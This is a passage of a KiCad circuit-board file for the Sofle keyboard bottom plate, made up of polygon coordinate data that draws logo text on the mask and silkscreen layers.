(xy -9.903394 -4.076324) (xy -9.906 -4.021667) (xy -9.935934 -3.950915) (xy -9.990667 -3.937) (xy -10.018535 -3.940154) (xy -10.039506 -3.956632) (xy -10.05456 -3.996959) (xy -10.064674 -4.071661) (xy -10.07083 -4.191262) (xy -10.074004 -4.366289) (xy -10.074981 -4.567033) (xy -9.884639 -4.567033) (xy -9.881559 -4.405398) (xy -9.867599 -4.303901) (xy -9.836075 -4.238121) (xy -9.780299 -4.183632) (xy -9.779498 -4.182982) (xy -9.681631 -4.126371) (xy -9.561787 -4.112742) (xy -9.488513 -4.118521) (xy -9.366752 -4.143583) (xy -9.281844 -4.181624) (xy -9.266413 -4.196974) (xy -9.248832 -4.265031) (xy -9.235711 -4.39229) (xy -9.229505 -4.553309) (xy -9.229315 -4.581608) (xy -9.231159 -4.749212) (xy -9.241372 -4.853887) (xy -9.265747 -4.917329) (xy -9.310079 -4.961235) (xy -9.33532 -4.978597) (xy -9.475391 -5.028654) (xy -9.596972 -5.023326) (xy -9.732821 -4.988471) (xy -9.8189 -4.926206) (xy -9.865605 -4.82004) (xy -9.883333 -4.653482) (xy -9.884639 -4.567033) (xy -10.074981 -4.567033) (xy -10.075178 -4.607266) (xy -10.075333 -4.847167) (xy -10.07504 -5.146748) (xy -10.073507 -5.372189) (xy -10.069756 -5.534013) (xy -10.062807 -5.642748) (xy -10.051681 -5.708916) (xy -10.0354 -5.743045) (xy -10.012983 -5.755659) (xy -9.990667 -5.757333) (xy -9.948482 -5.750263)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 3.26772 -6.66288) (xy 3.506145 -6.642926) (xy 3.6866 -6.598501) (xy 3.817076 -6.520466) (xy 3.905566 -6.399685) (xy 3.960062 -6.227019) (xy 3.988556 -5.99333) (xy 3.99904 -5.689479) (xy 4.000021 -5.482167) (xy 3.997323 -5.172736) (xy 3.987177 -4.935743) (xy 3.965801 -4.75904) (xy 3.929415 -4.630478) (xy 3.87424 -4.537908) (xy 3.796495 -4.469183) (xy 3.692399 -4.412152) (xy 3.662919 -4.398786) (xy 3.503947 -4.350858) (xy 3.288567 -4.315947) (xy 3.04431 -4.296007) (xy 2.798708 -4.292992) (xy 2.579295 -4.308854) (xy 2.521536 -4.317795) (xy 2.299844 -4.384079) (xy 2.137319 -4.498384) (xy 2.016199 -4.673369) (xy 2.012582 -4.680565) (xy 1.98008 -4.756332) (xy 1.957201 -4.842164) (xy 1.942337 -4.954013) (xy 1.933882 -5.107831) (xy 1.930529 -5.302168) (xy 2.415874 -5.302168) (xy 2.416461 -5.139788) (xy 2.424076 -5.029232) (xy 2.440551 -4.954114) (xy 2.467717 -4.898044) (xy 2.49577 -4.859193) (xy 2.595745 -4.77235) (xy 2.735796 -4.733122) (xy 2.763454 -4.730228) (xy 2.888674 -4.723271) (xy 2.982251 -4.725327) (xy 2.998546 -4.727852) (xy 3.078043 -4.737181) (xy 3.193408 -4.741321) (xy 3.199629 -4.741333) (xy 3.346467 -4.771704) (xy 3.429 -4.826) (xy 3.463413 -4.867924) (xy 3.48707 -4.923019) (xy 3.501943 -5.00662) (xy 3.510006 -5.134063) (xy 3.51323 -5.320681) (xy 3.513667 -5.484091) (xy 3.513026 -5.715065) (xy 3.509422 -5.877265) (xy 3.500334 -5.986584) (xy 3.483239 -6.058916) (xy 3.455615 -6.110151) (xy 3.414942 -6.156182) (xy 3.405509 -6.165673) (xy 3.346659 -6.218532) (xy 3.285799 -6.249462) (xy 3.200477 -6.262978) (xy 3.068243 -6.263593) (xy 2.941337 -6.258999) (xy 2.756372 -6.24909) (xy 2.623011 -6.22895) (xy 2.53241 -6.186249) (xy 2.475726 -6.108655) (xy 2.444115 -5.983839) (xy 2.428733 -5.799468) (xy 2.420738 -5.543213) (xy 2.420483 -5.53276) (xy 2.415874 -5.302168) (xy 1.930529 -5.302168) (xy 1.930228 -5.319568) (xy 1.929665 -5.503333) (xy 1.930996 -5.763389) (xy 1.936063 -5.954794) (xy 1.946474 -6.093538) (xy 1.963836 -6.195612) (xy 1.989759 -6.277004) (xy 2.012582 -6.327655) (xy 2.085183 -6.451437) (xy 2.171998 -6.541792) (xy 2.28681 -6.603645) (xy 2.443404 -6.641925) (xy 2.655562 -6.661559) (xy 2.93707 -6.667472) (xy 2.963333 -6.6675) (xy 3.26772 -6.66288)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 5.827818 -6.679357) (xy 5.946242 -6.669233) (xy 6.223 -6.639595) (xy 6.223 -6.235112) (xy 5.716353 -6.255978) (xy 5.449296 -6.262029) (xy 5.255325 -6.252254) (xy 5.1237 -6.222716) (xy 5.043679 -6.169478) (xy 5.004521 -6.088603) (xy 4.995333 -5.991689) (xy 5.009217 -5.884673) (xy 5.043039 -5.817937) (xy 5.047 -5.815065) (xy 5.107371 -5.79684) (xy 5.233096 -5.771057) (xy 5.405581 -5.741195) (xy 5.59903 -5.711759) (xy 5.845216 -5.672911) (xy 6.021617 -5.632911) (xy 6.142871 -5.5842) (xy 6.223617 -5.519218) (xy 6.278493 -5.430406) (xy 6.311377 -5.343924) (xy 6.338279 -5.195468) (xy 6.342076 -5.009234) (xy 6.325268 -4.816792) (xy 6.290356 -4.649715) (xy 6.248643 -4.551725) (xy 6.159416 -4.455031) (xy 6.056298 -4.382861) (xy 5.946065 -4.348601) (xy 5.773639 -4.321127) (xy 5.561345 -4.302169) (xy 5.331505 -4.293457) (xy 5.106443 -4.296723) (xy 5.0165 -4.302255) (xy 4.830274 -4.318983) (xy 4.712745 -4.340054) (xy 4.64812 -4.375265) (xy 4.620604 -4.43441) (xy 4.614405 -4.527285) (xy 4.614333 -4.551689) (xy 4.614333 -4.74143) (xy 5.194904 -4.738536) (xy 5.43153 -4.738571) (xy 5.597726 -4.742501) (xy 5.707698 -4.751925) (xy 5.77565 -4.768445) (xy 5.815789 -4.793661) (xy 5.829904 -4.810079) (xy 5.871135 -4.911355) (xy 5.882355 -5.036274) (xy 5.863416 -5.146995) (xy 5.831417 -5.196369) (xy 5.768749 -5.219148) (xy 5.64273 -5.24652) (xy 5.474226 -5.274368) (xy 5.355167 -5.290362) (xy 5.157779 -5.318629) (xy 4.977207 -5.351667) (xy 4.839934 -5.384309) (xy 4.792726 -5.400119) (xy 4.6573 -5.501193) (xy 4.570242 -5.67148) (xy 4.531729 -5.91058) (xy 4.529667 -5.992993) (xy 4.557273 -6.243766) (xy 4.637803 -6.439827) (xy 4.767823 -6.573559) (xy 4.799958 -6.592417) (xy 4.922928 -6.632374) (xy 5.108673 -6.662485) (xy 5.335719 -6.681312) (xy 5.582592 -6.687415) (xy 5.827818 -6.679357)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 8.324029 -6.65515) (xy 8.501834 -6.597652) (xy 8.636279 -6.506938) (xy 8.651394 -6.492394) (xy 8.726042 -6.399163) (xy 8.780706 -6.280937) (xy 8.819682 -6.121703) (xy 8.847264 -5.905445) (xy 8.862485 -5.705364) (xy 8.885745 -5.335894) (xy 8.115405 -5.324364) (xy 7.345066 -5.312833) (xy 7.357944 -5.1435) (xy 7.371221 -5.016378) (xy 7.387633 -4.91777) (xy 7.390986 -4.904636) (xy 7.439091 -4.832084) (xy 7.540227 -4.779966) (xy 7.702096 -4.746663) (xy 7.932402 -4.730558) (xy 8.22325 -4.72974) (xy 8.763 -4.739314) (xy 8.763 -4.554353) (xy 8.750061 -4.421147) (xy 8.714205 -4.351838) (xy 8.706522 -4.347719) (xy 8.621626 -4.331242) (xy 8.473889 -4.31765) (xy 8.285105 -4.307507) (xy 8.077069 -4.301374) (xy 7.871574 -4.299813) (xy 7.690415 -4.303388) (xy 7.555385 -4.31266) (xy 7.523871 -4.317207) (xy 7.300441 -4.373779) (xy 7.132437 -4.45945) (xy 7.01235 -4.58515) (xy 6.932674 -4.761803) (xy 6.885902 -5.000337) (xy 6.865808 -5.275008) (xy 6.859671 -5.63153) (xy 6.863644 -5.712327) (xy 7.338546 -5.712327) (xy 7.366061 -5.693541) (xy 7.43511 -5.681735) (xy 7.557953 -5.675371) (xy 7.746851 -5.672912) (xy 7.874408 -5.672667) (xy 8.434208 -5.672667) (xy 8.408682 -5.767917) (xy 8.387063 -5.891725) (xy 8.382578 -5.960341) (xy 8.353159 -6.056554) (xy 8.28268 -6.156742) (xy 8.278091 -6.161424) (xy 8.211393 -6.217328) (xy 8.13467 -6.248829) (xy 8.021995 -6.262596) (xy 7.874 -6.265333) (xy 7.708764 -6.261597) (xy 7.602107 -6.245944) (xy 7.5281 -6.211706) (xy 7.469909 -6.161424) (xy 7.386214 -6.032825) (xy 7.366 -5.932053) (xy 7.357531 -5.817098) (xy 7.340304 -5.739629) (xy 7.338546 -5.712327) (xy 6.863644 -5.712327) (xy 6.873661 -5.916011) (xy 6.91089 -6.139348) (xy 6.974467 -6.312439) (xy 7.067502 -6.446181) (xy 7.193107 -6.551472) (xy 7.238103 -6.579432) (xy 7.34106 -6.625673) (xy 7.474309 -6.656166) (xy 7.659173 -6.674864) (xy 7.788293 -6.681461) (xy 8.090352 -6.682173) (xy 8.324029 -6.65515)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 1.260116 -6.172228) (xy 1.253299 -5.758768) (xy 1.245287 -5.421408) (xy 1.234667 -5.151585) (xy 1.220025 -4.940731) (xy 1.199946 -4.780283) (xy 1.173017 -4.661675) (xy 1.137824 -4.576342) (xy 1.092954 -4.515718) (xy 1.036993 -4.471238) (xy 0.973667 -4.43681) (xy 0.86201 -4.400082) (xy 0.696561 -4.365987) (xy 0.508127 -4.340529) (xy 0.455083 -4.335738) (xy 0.084667 -4.306357) (xy 0.084667 -4.783667) (xy 0.309409 -4.783667) (xy 0.414641 -4.783251) (xy 0.498952 -4.78764) (xy 0.564813 -4.805295) (xy 0.614694 -4.844671) (xy 0.651067 -4.914229) (xy 0.676404 -5.022425) (xy 0.693175 -5.177718) (xy 0.703853 -5.388567) (xy 0.710908 -5.663429) (xy 0.716812 -6.010763) (xy 0.719667 -6.187788) (xy 0.740833 -7.471833) (xy 1.010231 -7.484562) (xy 1.279628 -7.49729) (xy 1.260116 -6.172228)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 10.795 -7.323667) (xy 10.583333 -7.323667) (xy 10.401235 -7.305483) (xy 10.284524 -7.243886) (xy 10.22371 -7.128308) (xy 10.209303 -6.948181) (xy 10.210865 -6.908865) (xy 10.2235 -6.6675) (xy 10.50925 -6.654983) (xy 10.795 -6.642465) (xy 10.795 -6.223) (xy 10.202333 -6.223) (xy 10.202333 -4.318) (xy 9.736667 -4.318) (xy 9.736667 -6.223) (xy 9.271 -6.223) (xy 9.271 -6.641909) (xy 9.49325 -6.654705) (xy 9.7155 -6.6675) (xy 9.737315 -7.030184) (xy 9.759574 -7.26456) (xy 9.802112 -7.435903) (xy 9.877233 -7.555596) (xy 9.997241 -7.635027) (xy 10.174442 -7.685581) (xy 10.421138 -7.718642) (xy 10.488083 -7.724888) (xy 10.795 -7.752127) (xy 10.795 -7.323667)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -4.276677 -6.95325) (xy -4.280296 -6.615821) (xy -4.293181 -6.353351) (xy -4.320205 -6.15625) (xy -4.366243 -6.014924) (xy -4.43617 -5.919782) (xy -4.53486 -5.86123) (xy -4.667188 -5.829676) (xy -4.838027 -5.815529) (xy -4.855196 -5.814792) (xy -5.019273 -5.811263) (xy -5.153127 -5.814189) (xy -5.231984 -5.822899) (xy -5.23875 -5.825173) (xy -5.28354 -5.882686) (xy -5.291667 -5.928556) (xy -5.283232 -5.968807) (xy -5.246474 -5.99226) (xy -5.164209 -6.002915) (xy -5.019255 -6.004768) (xy -4.966251 -6.004268) (xy -4.796339 -6.005066) (xy -4.688719 -6.015668) (xy -4.621155 -6.041107) (xy -4.571407 -6.086415) (xy -4.564085 -6.095263) (xy -4.509805 -6.206948) (xy -4.48798 -6.343623) (xy -4.487982 -6.344107) (xy -4.495489 -6.431158) (xy -4.51338 -6.457842) (xy -4.519732 -6.451588) (xy -4.623799 -6.364611) (xy -4.776276 -6.316282) (xy -4.949437 -6.308215) (xy -5.115552 -6.342027) (xy -5.23639 -6.409835) (xy -5.290462 -6.460221) (xy -5.324996 -6.51195) (xy -5.344366 -6.584388) (xy -5.352947 -6.696896) (xy -5.355114 -6.868838) (xy -5.355167 -6.935591) (xy -5.355074 -6.946874) (xy -5.164667 -6.946874) (xy -5.157362 -6.745724) (xy -5.136076 -6.616665) (xy -5.11175 -6.571406) (xy -4.974975 -6.508546) (xy -4.811764 -6.500152) (xy -4.656386 -6.54339) (xy -4.557199 -6.617293) (xy -4.513905 -6.68573) (xy -4.493362 -6.777275) (xy -4.491423 -6.917071) (xy -4.495039 -6.994122) (xy -4.509773 -7.146085) (xy -4.532635 -7.266016) (xy -4.557631 -7.326231) (xy -4.655612 -7.376559) (xy -4.796583 -7.398289) (xy -4.943247 -7.3897) (xy -5.05794 -7.349312) (xy -5.111795 -7.307472) (xy -5.143687 -7.2551) (xy -5.159306 -7.170745) (xy -5.164339 -7.032955) (xy -5.164667 -6.946874) (xy -5.355074 -6.946874) (xy -5.353539 -7.132235) (xy -5.346098 -7.264142) (xy -5.32901 -7.351222) (xy -5.298441 -7.413381) (xy -5.252538 -7.468423) (xy -5.178977 -7.532659) (xy -5.093875 -7.565654) (xy -4.966504 -7.577019) (xy -4.903288 -7.577667) (xy -4.741617 -7.569468) (xy -4.636989 -7.540368) (xy -4.572 -7.493) (xy -4.511312 -7.435738) (xy -4.48994 -7.438343) (xy -4.487333 -7.493) (xy -4.462529 -7.559393) (xy -4.3815 -7.577667) (xy -4.275667 -7.577667) (xy -4.276677 -6.95325)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -9.091083 -8.162694) (xy -8.995833 -8.149167) (xy -8.995833 -6.328833) (xy -9.091083 -6.315306) (xy -9.165655 -6.323326) (xy -9.186332 -6.388389) (xy -9.186333 -6.389389) (xy -9.189759 -6.448762) (xy -9.213737 -6.4469) (xy -9.271 -6.392333) (xy -9.347422 -6.339616) (xy -9.457293 -6.314213) (xy -9.599083 -6.309013) (xy -9.745925 -6.319008) (xy -9.865662 -6.343305) (xy -9.914919 -6.36538) (xy -10.000737 -6.471047) (xy -10.053117 -6.636878) (xy -10.074529 -6.871703) (xy -10.075333 -6.939106) (xy -10.075119 -6.942667) (xy -9.863667 -6.942667) (xy -9.861102 -6.771052) (xy -9.850092 -6.662913) (xy -9.825668 -6.597129) (xy -9.782858 -6.552579) (xy -9.769581 -6.542901) (xy -9.621244 -6.485385) (xy -9.455637 -6.489873) (xy -9.310962 -6.555121) (xy -9.30744 -6.557927) (xy -9.254392 -6.610754) (xy -9.224167 -6.67735) (xy -9.210594 -6.781473) (xy -9.2075 -6.942667) (xy -9.210747 -7.106562) (xy -9.224603 -7.209665) (xy -9.255239 -7.275734) (xy -9.30744 -7.327407) (xy -9.450929 -7.394411) (xy -9.616467 -7.40069) (xy -9.765849 -7.345003) (xy -9.769581 -7.342433) (xy -9.817437 -7.299811) (xy -9.845738 -7.24092) (xy -9.859456 -7.144642) (xy -9.86356 -6.989856) (xy -9.863667 -6.942667) (xy -10.075119 -6.942667) (xy -10.059495 -7.201859) (xy -10.012808 -7.394812) (xy -9.936511 -7.513636) (xy -9.90433 -7.536227) (xy -9.790825 -7.567773) (xy -9.634235 -7.577483) (xy -9.469835 -7.566741) (xy -9.3329 -7.536928) (xy -9.28042 -7.511766) (xy -9.186333 -7.445866) (xy -9.186333 -7.811044) (xy -9.185269 -7.9867) (xy -9.179192 -8.093667) (xy -9.163775 -8.147922) (xy -9.13469 -8.16544) (xy -9.091083 -8.162694)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -7.88302 -7.56675) (xy -7.741122 -7.526013) (xy -7.651184 -7.443479) (xy -7.597803 -7.30717) (xy -7.574127 -7.174725) (xy -7.559354 -7.035965) (xy -7.555734 -6.931872) (xy -7.561543 -6.892174) (xy -7.610198 -6.8778) (xy -7.724448 -6.866407) (xy -7.885233 -6.859452) (xy -8.00879 -6.858) (xy -8.434917 -6.858) (xy -8.407888 -6.720417) (xy -8.370065 -6.602841) (xy -8.302043 -6.529061) (xy -8.188301 -6.491485) (xy -8.013316 -6.482519) (xy -7.926818 -6.485064) (xy -7.768584 -6.49028) (xy -7.676834 -6.485851) (xy -7.633523 -6.466947) (xy -7.620606 -6.428739) (xy -7.619902 -6.402917) (xy -7.624696 -6.356239) (xy -7.650273 -6.328181) (xy -7.7136 -6.314248) (xy -7.831645 -6.309942) (xy -7.96925 -6.31035) (xy -8.144588 -6.316027) (xy -8.296427 -6.328676) (xy -8.39744 -6.345826) (xy -8.410983 -6.350296) (xy -8.50479 -6.413102) (xy -8.562152 -6.52028) (xy -8.590664 -6.688445) (xy -8.594676 -6.752167) (xy -8.602804 -7.002106) (xy -8.602214 -7.027333) (xy -8.434917 -7.027333) (xy -8.090958 -7.027333) (xy -7.921248 -7.028668) (xy -7.819101 -7.035867) (xy -7.767422 -7.053723) (xy -7.749115 -7.087027) (xy -7.747 -7.123747) (xy -7.781137 -7.272924) (xy -7.879602 -7.369435) (xy -8.036476 -7.407879) (xy -8.058809 -7.408333) (xy -8.230956 -7.387883) (xy -8.340535 -7.320407) (xy -8.400716 -7.196722) (xy -8.407888 -7.164917) (xy -8.434917 -7.027333) (xy -8.602214 -7.027333) (xy -8.598553 -7.18366) (xy -8.579645 -7.312505) (xy -8.543801 -7.404317) (xy -8.489758 -7.473758) (xy -8.422023 -7.530278) (xy -8.343832 -7.561813) (xy -8.228752 -7.575271) (xy -8.092281 -7.577667) (xy -7.88302 -7.56675)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -6.704296 -7.568947) (xy -6.533048 -7.559562) (xy -6.429474 -7.544373) (xy -6.376597 -7.519137) (xy -6.357939 -7.482417) (xy -6.360152 -7.444345) (xy -6.395731 -7.42199) (xy -6.48101 -7.411335) (xy -6.632319 -7.408365) (xy -6.659213 -7.408333) (xy -6.858021 -7.399878) (xy -6.984637 -7.370455) (xy -7.050217 -7.313978) (xy -7.065918 -7.22436) (xy -7.062333 -7.188414) (xy -7.04585 -7.136055) (xy -7.00209 -7.100662) (xy -6.912528 -7.073899) (xy -6.758639 -7.047432) (xy -6.74418 -7.045255) (xy -6.546651 -7.009681) (xy -6.418969 -6.965921) (xy -6.346409 -6.901774) (xy -6.314246 -6.805034) (xy -6.307667 -6.683483) (xy -6.319171 -6.525557) (xy -6.362128 -6.418015) (xy -6.4492 -6.351865) (xy -6.593052 -6.318112) (xy -6.806346 -6.307763) (xy -6.836833 -6.307667) (xy -7.011257 -6.308911) (xy -7.117739 -6.315593) (xy -7.172999 -6.332138) (xy -7.193757 -6.36297) (xy -7.196762 -6.402917) (xy -7.191753 -6.452307) (xy -7.164406 -6.479508) (xy -7.096431 -6.489492) (xy -6.969536 -6.487236) (xy -6.898462 -6.484033) (xy -6.699649 -6.483674) (xy -6.571147 -6.508677) (xy -6.501012 -6.564346) (xy -6.477297 -6.655987) (xy -6.477 -6.671194) (xy -6.495069 -6.75084) (xy -6.558003 -6.806271) (xy -6.678893 -6.844016) (xy -6.870828 -6.870605) (xy -6.878226 -6.871338) (xy -7.056083 -6.900696) (xy -7.165249 -6.956653) (xy -7.221018 -7.055097) (xy -7.238686 -7.211917) (xy -7.239 -7.246115) (xy -7.225885 -7.389481) (xy -7.178485 -7.48617) (xy -7.084714 -7.543481) (xy -6.932489 -7.568708) (xy -6.709726 -7.569147) (xy -6.704296 -7.568947)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -5.80946 -7.573506) (xy -5.786532 -7.552637) (xy -5.771539 -7.502484) (xy -5.762803 -7.410469) (xy -5.758648 -7.264015) (xy -5.757397 -7.050544) (xy -5.757333 -6.942667) (xy -5.757888 -6.698618) (xy -5.760671 -6.526656) (xy -5.767358 -6.414205) (xy -5.779627 -6.348687) (xy -5.799154 -6.317524) (xy -5.827617 -6.30814) (xy -5.842 -6.307667) (xy -5.87454 -6.311828) (xy -5.897468 -6.332697) (xy -5.912462 -6.38285) (xy -5.921198 -6.474865) (xy -5.925353 -6.621319) (xy -5.926604 -6.83479) (xy -5.926667 -6.942667) (xy -5.926112 -7.186716) (xy -5.92333 -7.358677) (xy -5.916642 -7.471129) (xy -5.904374 -7.536647) (xy -5.884847 -7.56781) (xy -5.856384 -7.577194) (xy -5.842 -7.577667) (xy -5.80946 -7.573506)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -3.083561 -7.566964) (xy -2.939125 -7.513825) (xy -2.915107 -7.496765) (xy -2.87411 -7.458654) (xy -2.845559 -7.411888) (xy -2.826632 -7.340857) (xy -2.814508 -7.229953) (xy -2.806366 -7.063567) (xy -2.800332 -6.861765) (xy -2.785498 -6.307667) (xy -3.005667 -6.307667) (xy -3.006315 -6.783917) (xy -3.010005 -6.98138) (xy -3.019507 -7.151059) (xy -3.033309 -7.272924) (xy -3.047104 -7.323667) (xy -3.114997 -7.364297) (xy -3.233643 -7.384728) (xy -3.371496 -7.384636) (xy -3.497009 -7.363694) (xy -3.57066 -7.329067) (xy -3.602053 -7.288733) (xy -3.622728 -7.219568) (xy -3.634684 -7.106164) (xy -3.63992 -6.933113) (xy -3.640667 -6.789317) (xy -3.640667 -6.307667) (xy -3.852333 -6.307667) (xy -3.852333 -6.942667) (xy -3.851779 -7.186716) (xy -3.848996 -7.358677) (xy -3.842309 -7.471129) (xy -3.83004 -7.536647) (xy -3.810513 -7.56781) (xy -3.78205 -7.577194) (xy -3.767667 -7.577667) (xy -3.697407 -7.548258) (xy -3.683 -7.489928) (xy -3.683 -7.402188) (xy -3.571458 -7.489928) (xy -3.434428 -7.554654) (xy -3.260229 -7.580454) (xy -3.083561 -7.566964)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -1.660966 -7.568189) (xy -1.58499 -7.542526) (xy -1.516689 -7.49383) (xy -1.508341 -7.486675) (xy -1.441283 -7.416349) (xy -1.404702 -7.334086) (xy -1.388227 -7.210257) (xy -1.384613 -7.133167) (xy -1.375833 -6.879167) (xy -2.249729 -6.854971) (xy -2.221572 -6.718902) (xy -2.184242 -6.603683) (xy -2.119104 -6.53069) (xy -2.010191 -6.492127) (xy -1.841539 -6.480195) (xy -1.735667 -6.48161) (xy -1.573281 -6.484227) (xy -1.477952 -6.477979) (xy -1.432214 -6.458912) (xy -1.418601 -6.42307) (xy -1.418167 -6.409732) (xy -1.426426 -6.370024) (xy -1.462115 -6.344913) (xy -1.541605 -6.330269) (xy -1.681266 -6.321959) (xy -1.778 -6.31891) (xy -2.017451 -6.32112) (xy -2.179149 -6.343506) (xy -2.241504 -6.367239) (xy -2.3126 -6.417115) (xy -2.360306 -6.483089) (xy -2.389293 -6.581869) (xy -2.404236 -6.730164) (xy -2.409808 -6.944685) (xy -2.410025 -6.969727) (xy -2.409055 -7.027333) (xy -2.250394 -7.027333) (xy -1.566333 -7.027333) (xy -1.566333 -7.15131) (xy -1.597167 -7.290398) (xy -1.691235 -7.375263) (xy -1.850885 -7.407836) (xy -1.878766 -7.408333) (xy -2.047432 -7.38836) (xy -2.154385 -7.321488) (xy -2.21432 -7.197295) (xy -2.221905 -7.164917) (xy -2.250394 -7.027333) (xy -2.409055 -7.027333) (xy -2.406117 -7.201773) (xy -2.383113 -7.363127) (xy -2.330362 -7.46734) (xy -2.237214 -7.527964) (xy -2.093019 -7.558552) (xy -1.938072 -7.570287) (xy -1.770148 -7.575787) (xy -1.660966 -7.568189)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy 0.042333 -7.241944) (xy 0.042053 -6.937919) (xy 0.040584 -6.70817) (xy 0.036986 -6.542308) (xy 0.030317 -6.429945) (xy 0.019635 -6.36069) (xy 0.003998 -6.324154) (xy -0.017534 -6.309948) (xy -0.042333 -6.307667) (xy -0.112593 -6.337075) (xy -0.127 -6.395406) (xy -0.127 -6.483145) (xy -0.238543 -6.395406) (xy -0.371141 -6.332673) (xy -0.541432 -6.305807) (xy -0.714981 -6.315463) (xy -0.857356 -6.362298) (xy -0.88804 -6.383044) (xy -0.965549 -6.492662) (xy -1.016842 -6.659093) (xy -1.041538 -6.858519) (xy -1.040468 -6.956171) (xy -0.848244 -6.956171) (xy -0.835666 -6.787182) (xy -0.799458 -6.640645) (xy -0.740459 -6.54082) (xy -0.706747 -6.517622) (xy -0.582877 -6.492073) (xy -0.437888 -6.498737) (xy -0.306521 -6.532543) (xy -0.223735 -6.588117) (xy -0.191395 -6.678986) (xy -0.173707 -6.822697) (xy -0.170625 -6.988713) (xy -0.182102 -7.146494) (xy -0.20809 -7.265502) (xy -0.224825 -7.298706) (xy -0.311263 -7.357838) (xy -0.444312 -7.39227) (xy -0.588501 -7.398077) (xy -0.708362 -7.371334) (xy -0.735782 -7.355263) (xy -0.799142 -7.264471) (xy -0.836349 -7.123354) (xy -0.848244 -6.956171) (xy -1.040468 -6.956171) (xy -1.039252 -7.067125) (xy -1.009603 -7.261092) (xy -0.952208 -7.416603) (xy -0.90568 -7.480169) (xy -0.822595 -7.542208) (xy -0.715305 -7.571413) (xy -0.582844 -7.577667) (xy -0.417636 -7.56406) (xy -0.291314 -7.52786) (xy -0.265151 -7.512979) (xy -0.172796 -7.448291) (xy -0.160481 -7.798729) (xy -0.152766 -7.971152) (xy -0.141046 -8.076486) (xy -0.120129 -8.1323) (xy -0.084822 -8.156165) (xy -0.052917 -8.162694) (xy 0.042333 -8.176222) (xy 0.042333 -7.241944)) (layer F.Mask) (width 0.01)) (fp_poly (pts (xy -5.785483 -8.159352) (xy -5.760122 -8.107712) (xy -5.757333 -8.046278) (xy -5.767967 -7.954315) (xy -5.814271 -7.920003) (xy -5.865979 -7.916333) (xy -5.943387 -7.928535) (xy -5.964736 -7.982684) (xy -5.961229 -8.03275) (xy -5.926152 -8.128476) (xy -5.852583 -8.162694) (xy -5.785483 -8.159352)) (layer F.Mask) (width 0.01)) ) (module SofleKeyboardBottomPlate:SofleLogo2 (layer F.Cu) (tedit 0) (tstamp 5DA521EE) (at 36.95 38.62) (fp_text reference Ref** (at 0 0) (layer F.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value Val** (at 0 0) (layer F.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_poly (pts (xy 31.71825 -9.390099) (xy 31.817079 -9.367925) (xy 31.859817 -9.311743) (xy 31.86915 -9.261233) (xy 31.882466 -9.145633) (xy 31.974983 -9.250695) (xy 32.085144 -9.335145) (xy 32.205083 -9.38217) (xy 32.297363 -9.394341) (xy 32.335085 -9.367613) (xy 32.34263 -9.280659) (xy 32.342667 -9.261826) (xy 32.334877 -9.166488) (xy 32.296124 -9.112579) (xy 32.203334 -9.073568) (xy 32.170052 -9.063352) (xy 32.05101 -9.009979) (xy 31.967345 -8.92434) (xy 31.913896 -8.793715) (xy 31.885503 -8.605379) (xy 31.877002 -8.346611) (xy 31.877 -8.341026) (xy 31.877 -7.958666) (xy 31.580667 -7.958666) (xy 31.580667 -9.403364) (xy 31.71825 -9.390099)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 21.971 -9.059333) (xy 22.113524 -9.059333) (xy 22.178582 -9.064796) (xy 22.237552 -9.088754) (xy 22.30314 -9.14256) (xy 22.388054 -9.237565) (xy 22.504999 -9.385123) (xy 22.563667 -9.4615) (xy 22.695438 -9.631956) (xy 22.789846 -9.745913) (xy 22.860184 -9.814713) (xy 22.919744 -9.849696) (xy 22.981817 -9.862207) (xy 23.034976 -9.863666) (xy 23.138958 -9.858298) (xy 23.195333 -9.84494) (xy 23.198667 -9.84024) (xy 23.174136 -9.798627) (xy 23.108705 -9.707847) (xy 23.014616 -9.584647) (xy 22.974298 -9.533323) (xy 22.852839 -9.378897) (xy 22.735671 -9.228308) (xy 22.644976 -9.110093) (xy 22.632829 -9.093998) (xy 22.51573 -8.938162) (xy 22.878112 -8.448414) (xy 23.240493 -7.958666) (xy 23.055405 -7.958666) (xy 22.975564 -7.960692) (xy 22.912944 -7.974336) (xy 22.853789 -8.010947) (xy 22.784346 -8.081874) (xy 22.69086 -8.198467) (xy 22.568028 -8.360833) (xy 22.437171 -8.53258) (xy 22.34299 -8.64711) (xy 22.272659 -8.715895) (xy 22.213353 -8.750405) (xy 22.152246 -8.762112) (xy 22.11837 -8.763) (xy 21.971 -8.763) (xy 21.971 -7.958666) (xy 21.674667 -7.958666) (xy 21.674667 -9.863666) (xy 21.971 -9.863666) (xy 21.971 -9.059333)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 18.923 -7.958666) (xy 18.626667 -7.958666) (xy 18.626667 -10.033) (xy 18.923 -10.033) (xy 18.923 -7.958666)) (layer F.SilkS) (width 0.01)) (fp_poly (pts (xy 18.330333 -9.911922) (xy 18.322502 -9.82239) (xy 18.281748 -9.785903) (xy 18.183656 -9.779) (xy 18.050793 -9.749862) (xy 17.973852 -9.659739) (xy 17.949333 -9.506616) (xy 17.956835 -9.439642) (xy 17.994505 -9.407911) (xy 18.085093 -9.398452) (xy 18.139833 -9.398) (xy 18.256885 -9.394837) (xy 18.312312 -9.3734) (xy 18.329158 -9.315768) (xy 18.330333 -9.249833) (xy 18.326266 -9.158793) (xy 18.298705 -9.115683) (xy 18.224606 -9.10258) (xy 18.139833 -9.101666) (xy 17.949333 -9.101666) (xy 17.949333 -7.958666) (xy 17.653 -7.958666) (xy 17.653 -9.096302) (xy 17.515417 -9.109568) (xy 17.420072 -9.128658) (xy 17.383076 -9.178067) (xy 17.377833 -9.249833) (xy 17.38926 -9.340292) (xy 17.441259 -9.37895) (xy 17.509788 -9.389679) (xy 17.587939 -9.403275) (xy 17.630915 -9.439553) 